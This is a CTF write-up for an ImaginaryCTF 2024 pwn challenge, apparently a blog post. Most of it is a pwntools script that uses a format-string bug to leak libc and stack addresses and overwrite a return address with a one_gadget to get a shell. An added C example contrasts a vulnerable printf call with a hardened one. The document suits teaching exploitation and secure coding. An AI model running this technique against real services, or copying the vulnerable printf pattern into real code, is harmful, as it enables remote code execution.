Introduction
ImaginaryCTF 2024 is a cybersecurity CTF competition run by ImaginaryCTF with a variety of challenges for all skill levels. It runs from July 20 to July 22, starting and ending at 3 AM GMT+8. For more information, check out last year's challenges from ImaginaryCTF 2023, with over 2000 participants.
Preface
I'll fill in the rest next time; the fmt part alone could be its own article. It taught me a lot.
Lessons
It made me understand fmtstr_payload, and at the same time abandon it: I hand-rolled the arbitrary address write myself.
Approach
Use the format string vulnerability to get an arbitrary address write, then overwrite the return address with a one_gadget to get a shell.
exp
```python
from pwn import *

# `io` (the tube connected to the target) and `ind(s)` (the helper that
# feeds one format string to the program) are set up elsewhere in the
# writeup and are not shown on this page.

def exp():
    io.recvuntil(b">>")
    io.sendline(b"3")
    # Leak a libc pointer sitting at stack slot 9.
    ind("%9$p")
    io.recvuntil(b" --> ")
    leak_addr = int(io.recv(16), 16)
    log.info(f'leak_addr = {hex(leak_addr)}')
    io.recvuntil(b' [y/n]:')
    io.sendline(b"y")
    # Leak a stack pointer sitting at stack slot 22.
    ind("%22$p")
    io.recvuntil(b" -->")
    stack_addr = int(io.recv(16), 16)
    log.info(f'stack_addr = {hex(stack_addr)}')
    io.recvuntil(b' [y/n]:')
    io.sendline(b"y")
    libc = ELF('./libc.so.6')
    libc_base = leak_addr - 275 - libc.sym['_IO_file_overflow']
    log.info(f'libc_base = {hex(libc_base)}')
    one_gadget = libc_base + 0xe3b01
    log.info(f'one_gadget = {hex(one_gadget)}')
    # Slot to overwrite: the saved return address, 8 bytes above the leaked stack pointer.
    stack_1 = stack_addr + 8
    # Step 1: retarget the low byte of the pointer stored in slot 18 to stack_1.
    payload = "%" + str(stack_1 & 0xff) + "c" + "%18$hhn"
    ind(payload)
    io.recvuntil(b' [y/n]:')
    io.sendline(b"y")
    sleep(2)
    # Step 2: write the low 16 bits of one_gadget through the pointer read via slot 22.
    payload = "%" + str(one_gadget & 0xffff) + "c" + "%22$hn"
    ind(payload)
    io.recvuntil(b' [y/n]:')
    io.sendline(b"y")
    sleep(2)
    # Step 3: move the slot-18 pointer two bytes up, to stack_1 + 2.
    payload = "%" + str((stack_1 + 2) & 0xff) + "c" + "%18$hhn"
    ind(payload)
    io.recvuntil(b' [y/n]:')
    io.sendline(b"y")
    sleep(2)
    # Step 4: write the third byte of one_gadget, completing the 3-byte overwrite.
    payload = "%" + str((one_gadget >> 16) & 0xff) + "c" + "%22$hhn"
    ind(payload)
    io.recvuntil(b' [y/n]:')
    io.sendline(b"n")
    sleep(2)

exp()
io.interactive()
```
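To make the mechanic behind those `%<N>c...%k$hhn` / `%k$hn` payloads concrete, here is an added C example (my own code, not part of the original writeup or the challenge binary) showing the vulnerable pattern, its hardened form, and how the padding count lands in a byte or a short through a legitimate pointer argument; the function names are my own.

```c
#include <stdio.h>

/* Output sink for the demonstrations, large enough that no padding a
 * %hn write needs (at most 0xffff bytes) is ever truncated. */
static char scratch[0x10001];

/* Vulnerable pattern: the user-controlled string *is* the format.
 * Any %n-family conversion in it makes printf store the running output
 * count through whatever the selected argument slot holds (the "%22$hn"
 * style positional reference in the exploit picks that slot). */
int vulnerable_echo(const char *user_input) {
    return printf(user_input);   /* gcc -Wformat-security warns here */
}

/* Hardened form: the format is a literal and user data is only an
 * argument, so a "%n" in the input is printed as text, never interpreted. */
int hardened_echo(const char *user_input) {
    return snprintf(scratch, sizeof scratch, "%s", user_input);
}

/* The write primitive the payloads rely on, with an explicit pointer
 * argument: "%*c" pads the output to n bytes, then "%hhn" stores the low
 * byte of the count into *target. Returning the landed byte shows the
 * truncation the exploit's "& 0xff" accounts for. */
unsigned char fmt_write_byte(unsigned int n) {
    signed char target = 0;
    snprintf(scratch, sizeof scratch, "%*c%hhn", (int)n, 'x', &target);
    return (unsigned char)target;
}

/* Same mechanic with "%hn": two bytes at once (the writeup's "%22$hn"
 * step), at the cost of emitting up to 0xffff bytes of padding. */
unsigned short fmt_write_short(unsigned int n) {
    short target = 0;
    snprintf(scratch, sizeof scratch, "%*c%hn", (int)n, 'x', &target);
    return (unsigned short)target;
}

int main(void) {
    printf("byte  0x41  -> 0x%02x\n", fmt_write_byte(0x41));
    printf("byte  0x141 -> 0x%02x (low byte only)\n", fmt_write_byte(0x141));
    printf("short 0x3b01 -> 0x%04x\n", fmt_write_short(0xe3b01 & 0xffff));
    printf("hardened echo of \"%%n%%n\" stores nothing, len=%d\n",
           hardened_echo("%n%n"));
    return 0;
}
```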